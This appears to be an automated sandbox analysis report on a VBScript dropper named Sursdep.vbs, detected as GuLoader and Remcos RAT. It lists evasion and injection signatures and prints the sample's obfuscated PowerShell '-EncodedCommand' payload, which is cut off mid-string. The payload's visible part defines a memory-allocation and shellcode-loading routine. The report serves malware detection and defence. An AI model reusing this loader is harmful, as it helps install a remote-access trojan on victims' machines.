Edit tour
Windows
Analysis Report
Sursdep.vbs
Overview
General Information
Detection
GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Yara detected Remcos RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected MSILDownloaderGeneric
Yara detected GuLoader
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w10x64native
- wscript.exe (PID: 2768 cmdline:
C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\Sursd ep.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) - powershell.exe (PID: 6460 cmdline:
C:\Windows \SysWOW64\ Windowspow erShell\v1 .0\powersh ell.exe" - EncodedCom mand "IwBi AHIAZABmAG QAdAB0AG8A bgAgAFMAdA B2AG4AZQAg AFoAaQBuAG MAZQBkACAA SQBOAEQAUw BUAFQAIABN AGUAdAB0AG EAcgB0AGEA bQBnADcAIA BTAGEAbABh ACAAYwBlAG IAYQBsACAA RgBPAFIAUw BUACAATwBz AHQAZQBvAG wAaQB0ADEA IABVAG4AZA BpAHMAYwBv AHUANgAgAE EAZAByAGUA cwBzAGEAIA BDAGEAbgBh AGQAaQA5AC AATwBWAEUA UgBUAEEATA BFACAAQgBl AG0AZQAgAG QAZQBzAHQA cgB1AGsAdA BpACAATwBT AFQARQBBAE 4AUgBFAFQA TgAgAEQAcg BpAGYAdABz AHMAdAB5AH IAMQAgAEkA TgBEAEwARQ BEAEUATgBE AEUAIABCAG EAZwB0ADcA IABCAEEAUg BTAEwARQBE AEUAUwAgAE 8ATwBQAEgA TwAgAEwAYQ BjAGUAZAA5 ACAADQAKAE EAZABkAC0A VAB5AHAAZQ AgAC0AVAB5 AHAAZQBEAG UAZgBpAG4A aQB0AGkAbw BuACAAQAAi AA0ACgB1AH MAaQBuAGcA IABTAHkAcw B0AGUAbQA7 AA0ACgB1AH MAaQBuAGcA IABTAHkAcw B0AGUAbQAu AFIAdQBuAH QAaQBtAGUA LgBJAG4AdA BlAHIAbwBw AFMAZQByAH YAaQBjAGUA cwA7AA0ACg BwAHUAYgBs AGkAYwAgAH MAdABhAHQA aQBjACAAYw BsAGEAcwBz ACAASABlAH gAYQBzAHQA aQBjAGgAMQ ANAAoAewAN AAoAWwBEAG wAbABJAG0A cABvAHIAdA AoACIASwBF AFIATgBFAE wAMwAyACIA KQBdAHAAdQ BiAGwAaQBj ACAAcwB0AG EAdABpAGMA IABlAHgAdA BlAHIAbgAg AHYAbwBpAG QAIABSAHQA bABNAG8Adg BlAE0AZQBt AG8AcgB5AC gASQBuAHQA UAB0AHIAIA BCAGEAZwBm AHUAbABzAD UAMQAsAHIA ZQBmACAASQ BuAHQAMwAy ACAAQgBhAG cAZgB1AGwA cwA1ADIALA BpAG4AdAAg AEIAYQBnAG YAdQBsAHMA NQAzACkAOw ANAAoAWwBE AGwAbABJAG 0AcABvAHIA dAAoACIAbg B0AGQAbABs AC4AZABsAG wAIgAsACAA RQBuAHQAcg B5AFAAbwBp AG4AdAA9AC IATgB0AEEA bABsAG8AYw BhAHQAZQBW AGkAcgB0AH UAYQBsAE0A ZQBtAG8Acg B5ACIAKQBd AHAAdQBiAG wAaQBjACAA cwB0AGEAdA BpAGMAIABl AHgAdABlAH IAbgAgAGkA bgB0ACAAVg BBACgAaQBu AHQAIABIAG UAeABhAHMA dABpAGMAaA A2ACwAcgBl AGYAIABJAG 4AdAAzADIA IABTAGUAbQ BpAHIAZQAs AGkAbgB0AC AAQgBhAGcA ZgB1AGwAcw A1ACwAcgBl AGYAIABJAG 4AdAAzADIA IABIAGUAeA BhAHMAdABp AGMAaAAsAG kAbgB0ACAA UAByAGkAbg B0ADgALABp AG4AdAAgAE gAZQB4AGEA cwB0AGkAYw BoADcAKQA7 AA0ACgBbAE QAbABsAEkA bQBwAG8Acg B0ACgAIgBV AFMARQBSAD MAMgAiACkA XQBwAHUAYg BsAGkAYwAg AHMAdABhAH QAaQBjACAA ZQB4AHQAZQ ByAG4AIABJ AG4AdABQAH QAcgAgAEUA bgB1AG0AVw BpAG4AZABv AHcAcwAoAH UAaQBuAHQA IABCAGEAZw BmAHUAbABz ADUANQAsAG kAbgB0ACAA QgBhAGcAZg B1AGwAcwA1 ADYAKQA7AA 0ACgB9AA0A CgAiAEAADQ AKACMARABF AEgAQQBDAE gARQAgAFQA bwBzAHMAZQ AzACAAVABl AGEAdABlAH IANgAgAGQA aQBhAGwAZQ BjAHQAaQBj ACAARQBOAE wASQBTAFQA RQBEAFIAIA BGAGQAcwBl ADcAIABBAH MAdAByAG8A IABTAHcAZQ ByAHYAZQBy ADkAIABkAG 8AdwBuAGUA eQAgAHIAaQ BiAGgAdQBz AHQAIABUAG EAZwByACAA UwBwAHIAZw BlAHMAIABW AGkAbABsAG EANQAgAEgA ZQB0AGUAcg BvAGQAeQBu ADEAIABFAF UAUABMAE8A SQAgAEIAeQ B0AHQAZQAz ACAAcwBuAG sAZQByAGYA cgAgAEIAdQ BuAGQAZwBh AHIAbgAgAH MAdAByAG0A awByAGUAZA BzACAATAB0 AG4AaQBuAG cAYgBpADUA IABpAG4AZA BzACAAQQBp AHIAbABpAG YAdAA1ACAA TwBDAFQAQQ BWAEkATgBB AFYASQAgAF MAawBvAGsA bwBtAGkAcw